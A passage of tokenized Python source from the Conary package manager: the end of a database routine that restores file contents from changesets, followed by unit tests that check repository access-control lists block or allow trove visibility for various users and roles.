trailingRevision ( <EOL> ) . timeStamp = newStamp <EOL> newStamp -= <NUM_LIT:1> <EOL> troveNo , configRestoreList , normalRestoreList = self . _createInstallTroveObjects ( fileHostFilter = fileHostFilter , <EOL> callback = callback , <EOL> mirror = mirror , hidden = hidden , <EOL> allowIncomplete = allowIncomplete , <EOL> ) <EOL> configRestoreList , normalRestoreList = self . _filterRestoreList ( configRestoreList , normalRestoreList ) <EOL> configRestoreList . sort ( key = lambda x : x [ <NUM_LIT:0> : <NUM_LIT:5> ] ) <EOL> normalRestoreList . sort ( key = lambda x : x [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> self . _restoreConfig ( cs , configRestoreList ) <EOL> self . _restoreNormal ( cs , normalRestoreList , preRestored ) <EOL> for csTrove in newList : <EOL> if csTrove . troveType ( ) != trove . TROVE_TYPE_REMOVED : <EOL> continue <EOL> troveNo += <NUM_LIT:1> <EOL> if callback : <EOL> callback . creatingDatabaseTransaction ( troveNo , len ( newList ) ) <EOL> self . markTroveRemoved ( csTrove . getName ( ) , csTrove . getNewVersion ( ) , <EOL> csTrove . getNewFlavor ( ) ) <EOL> for ( troveName , version , flavor ) in cs . getOldTroveList ( ) : <EOL> trv = self . repos . getTrove ( troveName , version , flavor ) <EOL> self . oldTrove ( trv , None , troveName , version , flavor ) <EOL> def _restoreConfig ( self , cs , configRestoreList ) : <EOL> for ( pathId , newFileId , sha1 , oldfile , newFileId , <EOL> oldVersion , oldFileId , restoreContents ) in configRestoreList : <EOL> if cs . configFileIsDiff ( pathId , newFileId ) : <EOL> ( contType , fileContents ) = cs . getFileContents ( pathId , newFileId ) <EOL> assert ( oldVersion ) <EOL> try : <EOL> f = self . repos . getFileContents ( <EOL> [ ( oldFileId , oldVersion , oldfile ) ] ) [ <NUM_LIT:0> ] . get ( ) <EOL> except KeyError : <EOL> raise errors . IntegrityError ( <EOL> "<STR_LIT>" % ( <EOL> sha1helper . md5ToString ( pathId ) , <EOL> sha1helper . sha1ToString ( oldFileId ) ) ) <EOL> oldLines = f . readlines ( ) <EOL> f . close ( ) <EOL> del f <EOL> diff = fileContents . get ( ) . readlines ( ) <EOL> ( newLines , failedHunks ) = patch . patch ( oldLines , <EOL> diff ) <EOL> fileContents = filecontents . FromString ( <EOL> "<STR_LIT>" . join ( newLines ) ) <EOL> assert ( not failedHunks ) <EOL> else : <EOL> fileContents = filecontents . FromChangeSet ( cs , pathId , newFileId ) <EOL> self . addFileContents ( sha1 , fileContents , restoreContents , <NUM_LIT:1> ) <EOL> def _restoreNormal ( self , cs , normalRestoreList , preRestored ) : <EOL> ptrRestores = [ ] <EOL> ptrRefsAdded = { } <EOL> lastRestore = None <EOL> while normalRestoreList : <EOL> ( pathId , fileId , sha1 , restoreContents ) = normalRestoreList . pop ( <NUM_LIT:0> ) <EOL> if preRestored is not None and sha1 in preRestored : <EOL> continue <EOL> if ( pathId , fileId ) == lastRestore : <EOL> continue <EOL> lastRestore = ( pathId , fileId ) <EOL> try : <EOL> ( contType , fileContents ) = cs . getFileContents ( pathId , fileId , <EOL> compressed = True ) <EOL> except KeyError : <EOL> raise errors . IntegrityError ( <EOL> "<STR_LIT>" % ( <EOL> sha1helper . md5ToString ( pathId ) , <EOL> sha1helper . sha1ToString ( fileId ) ) ) <EOL> if contType == changeset . ChangedFileTypes . ptr : <EOL> ptrRestores . append ( sha1 ) <EOL> target = util . decompressString ( fileContents . get ( ) . read ( ) ) <EOL> if util . tupleListBsearchInsert ( normalRestoreList , <EOL> ( target [ : <NUM_LIT:16> ] , target [ <NUM_LIT:16> : ] , sha1 , True ) , <EOL> self . ptrCmp ) : <EOL> ptrRefsAdded [ sha1 ] = True <EOL> continue <EOL> assert ( contType == changeset . ChangedFileTypes . file ) <EOL> self . addFileContents ( sha1 , fileContents , restoreContents , <NUM_LIT:0> , <EOL> precompressed = True ) <EOL> for sha1 in ptrRestores : <EOL> if sha1 in ptrRefsAdded : <EOL> del ptrRefsAdded [ sha1 ] <EOL> else : <EOL> self . addFileContents ( sha1 , None , False , <NUM_LIT:0> ) </s>
<s> import copy <EOL> import cgi <EOL> import itertools <EOL> import os <EOL> from SimpleHTTPServer import SimpleHTTPRequestHandler <EOL> from testrunner import testhelp <EOL> from testutils import sock_utils <EOL> from conary_test import recipes <EOL> from conary_test . auth_helper import AuthHelper <EOL> from conary import conarycfg , versions , trove <EOL> from conary . build import use <EOL> from conary . deps import deps <EOL> from conary . lib import httputils <EOL> from conary . repository import errors , netclient <EOL> from conary . server . server import HTTPServer <EOL> class AclTest ( AuthHelper ) : <EOL> def testAddAcls ( self ) : <EOL> label = versions . Label ( "<STR_LIT>" ) <EOL> self . openRepository ( ) <EOL> repos = self . getRepositoryClient ( ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , True ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , False ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label , write = True ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , True ) <EOL> repos . setRoleCanMirror ( label , "<STR_LIT>" , False ) <EOL> self . addUserAndRole ( repos , label , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label , write = True ) <EOL> repos . addAcl ( label , "<STR_LIT>" , "<STR_LIT>" , label , write = True , <EOL> remove = True ) <EOL> repos . setRoleIsAdmin ( label , '<STR_LIT>' , True ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testBasicAcls ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> branchLabel = versions . Label ( "<STR_LIT>" ) <EOL> rootBranch = versions . VersionFromString ( '<STR_LIT>' ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1 ) <EOL> p = self . build ( recipes . doubleRecipe1 , "<STR_LIT>" ) <EOL> repos = self . getRepositoryClient ( ) <EOL> limitedRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , branchLabel ) <EOL> repos . deleteUserByName ( rootLabel , '<STR_LIT>' ) <EOL> branchRepos = self . setupEntitlement ( repos , "<STR_LIT>" , "<STR_LIT>" , <EOL> rootLabel , None , branchLabel , <EOL> withClass = True ) [ <NUM_LIT:0> ] <EOL> runtimeRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , None ) <EOL> repeatRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None , False , False ) <EOL> self . addUserAndRole ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT>' ) <EOL> taRepos = self . getRepositoryClient ( user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ p . getNameVersionFlavor ( ) ] ) <EOL> both = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> runtime = [ '<STR_LIT>' ] <EOL> assert ( set ( repos . troveNames ( rootLabel ) ) == <EOL> set ( both ) ) <EOL> assert ( limitedRepos . troveNames ( rootLabel ) == [ ] ) <EOL> assert ( branchRepos . troveNames ( rootLabel ) == [ ] ) <EOL> assert ( runtimeRepos . troveNames ( rootLabel ) == runtime ) <EOL> assert ( repeatRepos . troveNames ( rootLabel ) == runtime ) <EOL> assert ( taRepos . troveNames ( rootLabel ) == runtime ) <EOL> self . mkbranch ( self . cfg . buildLabel , branchLabel , '<STR_LIT>' ) <EOL> branchVersion = versions . VersionFromString ( <EOL> '<STR_LIT>' ) <EOL> oldLabel = self . cfg . buildLabel <EOL> self . cfg . buildLabel = branchLabel <EOL> self . updateSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1_1 ) <EOL> double1_1 = self . build ( recipes . doubleRecipe1_1 , "<STR_LIT>" ) <EOL> self . cfg . buildLabel = oldLabel <EOL> repos . addTroveAccess ( '<STR_LIT>' , [ double1_1 . getNameVersionFlavor ( ) ] ) <EOL> assert ( { } . fromkeys ( repos . troveNames ( branchLabel ) ) == <EOL> { } . fromkeys ( both ) ) <EOL> assert ( limitedRepos . troveNames ( branchLabel ) == runtime ) <EOL> assert ( { } . fromkeys ( branchRepos . troveNames ( branchLabel ) ) == <EOL> { } . fromkeys ( both ) ) <EOL> assert ( runtimeRepos . troveNames ( branchLabel ) == runtime ) <EOL> assert ( taRepos . troveNames ( rootLabel ) == runtime ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> d = repos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = branchRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:3> ] } ) <EOL> d = runtimeRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> q = { None : { self . cfg . buildLabel : None } } <EOL> d = repos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionsByLabel ( q ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveVersionsByLabel ( q ) <EOL> assert ( d == { } ) <EOL> d = runtimeRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> } <EOL> q = { None : { branchLabel : None } } <EOL> d = repos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = branchRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = runtimeRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionsByLabel ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> } <EOL> d = repos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = branchRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:2> ] , <EOL> } ) <EOL> d = runtimeRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getAllTroveLeaves ( '<STR_LIT:localhost>' , { None : None } ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } <EOL> qd = { None : { self . cfg . buildLabel : None } } <EOL> d = repos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveLeavesByLabel ( qd ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveLeavesByLabel ( qd ) <EOL> assert ( d == { } ) <EOL> d = runtimeRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> } <EOL> qd = { None : { branchLabel : None } } <EOL> d = repos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = branchRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = runtimeRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> q = { '<STR_LIT>' : { branchVersion : None } , <EOL> '<STR_LIT>' : { rootBranch : None } <EOL> } <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> d = repos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveLeavesByBranch ( q ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = runtimeRepos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveLeavesByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> q = { '<STR_LIT>' : { branchVersion : None } , <EOL> '<STR_LIT>' : { rootBranch : None } <EOL> } <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' ] , <EOL> } <EOL> d = repos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionsByBranch ( q ) <EOL> assert ( d == { } ) <EOL> d = branchRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = runtimeRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionsByBranch ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> versionList = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , ] <EOL> versionDict = { } . fromkeys ( [ versions . VersionFromString ( x ) for x in <EOL> versionList ] , [ None ] ) <EOL> q = { '<STR_LIT>' : versionDict , <EOL> '<STR_LIT>' : versionDict <EOL> } <EOL> full = { '<STR_LIT>' : versionList , <EOL> '<STR_LIT>' : versionList , <EOL> } <EOL> d = repos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = limitedRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : versionList [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = branchRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : versionList [ <NUM_LIT:0> : <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : versionList [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> d = runtimeRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = repeatRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> d = taRepos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , <EOL> { '<STR_LIT>' : full [ '<STR_LIT>' ] } ) <EOL> flavor = deps . Flavor ( ) <EOL> if use . Arch . x86 : <EOL> flavor . addDep ( deps . InstructionSetDependency , <EOL> deps . Dependency ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , deps . FLAG_SENSE_REQUIRED ) ] ) ) <EOL> elif use . Arch . x86_64 : <EOL> pass <EOL> else : <EOL> raise NotImplementedError , '<STR_LIT>' <EOL> versionDict = { } . fromkeys ( [ versions . VersionFromString ( x ) for x in <EOL> versionList ] , [ flavor ] ) <EOL> q = { '<STR_LIT>' : versionDict , <EOL> '<STR_LIT>' : versionDict <EOL> } <EOL> d = repos . getTroveVersionFlavors ( q ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> all = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> all = list ( self . asSet ( all ) ) <EOL> troves = dict ( itertools . izip ( all , repos . getTroves ( all ) ) ) <EOL> for testRepos in ( limitedRepos , branchRepos , repeatRepos ) : <EOL> canSee = testRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> canSee = self . asSet ( canSee ) <EOL> isPresent = testRepos . hasTroves ( all ) <EOL> for trvInfo in all : <EOL> if trvInfo == '<STR_LIT>' : <EOL> files = [ ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:2> ] , x [ <NUM_LIT:3> ] ) for x in <EOL> troves [ trvInfo ] . iterFileList ( ) ] <EOL> else : <EOL> files = '<STR_LIT>' <EOL> if trvInfo in canSee : <EOL> assert ( isPresent [ trvInfo ] ) <EOL> testRepos . getTrove ( * trvInfo ) <EOL> if files : <EOL> testRepos . getFileVersions ( files ) <EOL> testRepos . getFileContents ( [ x [ <NUM_LIT:1> : <NUM_LIT:3> ] for x in files ] ) <EOL> else : <EOL> assert ( not isPresent [ trvInfo ] ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> testRepos . getTrove , * trvInfo ) <EOL> if files : <EOL> self . assertRaises ( errors . FileStreamMissing , <EOL> testRepos . getFileVersions , files ) <EOL> self . assertRaises ( errors . FileStreamNotFound , <EOL> testRepos . getFileContents , <EOL> [ x [ <NUM_LIT:1> : <NUM_LIT:3> ] for x in files ] ) <EOL> new = testRepos . getNewTroveList ( '<STR_LIT:localhost>' , <NUM_LIT:0> ) <EOL> assert ( canSee == set ( [ x [ <NUM_LIT:1> ] for x in new ] ) ) <EOL> all = repos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> del all [ "<STR_LIT>" ] <EOL> all = list ( self . asSet ( all ) ) <EOL> troves = dict ( itertools . izip ( all , repos . getTroves ( all ) ) ) <EOL> infos = dict ( itertools . izip ( all , repos . getTroveInfo ( <EOL> trove . _TROVEINFO_TAG_SOURCENAME , all ) ) ) <EOL> for trv in all : <EOL> assert ( troves [ trv ] . troveInfo . sourceName == infos [ trv ] ) <EOL> infos = dict ( itertools . izip ( all , repos . getTroveInfo ( <EOL> trove . _TROVEINFO_TAG_SIGS , all ) ) ) <EOL> for trv in all : <EOL> assert ( troves [ trv ] . troveInfo . sigs == infos [ trv ] ) <EOL> self . assertRaises ( errors . TroveMissing , limitedRepos . getTroveInfo , <EOL> trove . _TROVEINFO_TAG_SOURCENAME , all ) <EOL> all . append ( ( '<STR_LIT>' , versions . VersionFromString ( '<STR_LIT>' ) , <EOL> deps . Flavor ( ) ) ) <EOL> self . assertRaises ( errors . TroveMissing , repos . getTroveInfo , <EOL> trove . _TROVEINFO_TAG_SOURCENAME , all ) <EOL> d = taRepos . getTroveVersionList ( '<STR_LIT:localhost>' , { None : None } ) <EOL> for i in taRepos . getTroveInfo ( trove . _TROVEINFO_TAG_SOURCENAME , list ( self . asSet ( d ) ) ) : <EOL> self . assertEqual ( i ( ) , "<STR_LIT>" ) <EOL> def testCompoundAcls ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> branchLabel = versions . Label ( "<STR_LIT>" ) <EOL> rootBranch = versions . VersionFromString ( '<STR_LIT>' ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . testSuiteRecipe ) <EOL> self . build ( recipes . testSuiteRecipe , "<STR_LIT>" ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1 ) <EOL> self . build ( recipes . doubleRecipe1 , "<STR_LIT>" ) <EOL> repos = self . getRepositoryClient ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> repeatRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> repos . addAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , None ) <EOL> full = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> qd = { None : { self . cfg . buildLabel : None } } <EOL> d = repos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> d = repeatRepos . getTroveLeavesByLabel ( qd ) <EOL> self . cmpTroveVersionList ( d , <EOL> { <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : full [ '<STR_LIT>' ] , <EOL> } ) <EOL> def testAclChanges ( self ) : <EOL> rootLabel = versions . Label ( "<STR_LIT>" ) <EOL> branchLabel = versions . Label ( "<STR_LIT>" ) <EOL> rootBranch = versions . VersionFromString ( '<STR_LIT>' ) <EOL> self . makeSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1 ) <EOL> self . build ( recipes . doubleRecipe1 , "<STR_LIT>" ) <EOL> repos = self . getRepositoryClient ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> limitedRepos = self . setupUser ( repos , rootLabel , '<STR_LIT>' , '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , branchLabel ) <EOL> both = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> runtime = [ '<STR_LIT>' ] <EOL> assert ( limitedRepos . troveNames ( branchLabel ) == [ ] ) <EOL> self . mkbranch ( self . cfg . buildLabel , branchLabel , '<STR_LIT>' ) <EOL> branchVersion = versions . VersionFromString ( <EOL> '<STR_LIT>' ) <EOL> oldLabel = self . cfg . buildLabel <EOL> self . cfg . buildLabel = branchLabel <EOL> self . updateSourceTrove ( '<STR_LIT>' , recipes . doubleRecipe1_1 ) <EOL> double1_1 = self . build ( recipes . doubleRecipe1_1 , "<STR_LIT>" ) <EOL> self . cfg . buildLabel = oldLabel <EOL> assert ( limitedRepos . troveNames ( branchLabel ) == runtime ) <EOL> full = { '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , { '<STR_LIT>' : <EOL> full [ '<STR_LIT>' ] [ <NUM_LIT:0> : <NUM_LIT:1> ] } ) <EOL> try : <EOL> limitedRepos . editAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel , None , None , False ) <EOL> except errors . InsufficientPermission : <EOL> pass <EOL> else : <EOL> assert ( <NUM_LIT:0> ) <EOL> repos . editAcl ( rootLabel , '<STR_LIT>' , '<STR_LIT>' , branchLabel , None , <EOL> None , False ) <EOL> d = limitedRepos . getTroveVersionList ( '<STR_LIT:localhost>' , <EOL> { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None } ) <EOL> self . cmpTroveVersionList ( d , full ) <EOL> assert repos . listAcls ( rootLabel , '<STR_LIT>' ) == [ <EOL> dict ( label = '<STR_LIT>' , item = '<STR_LIT>' , canWrite = <NUM_LIT:0> , canRemove = 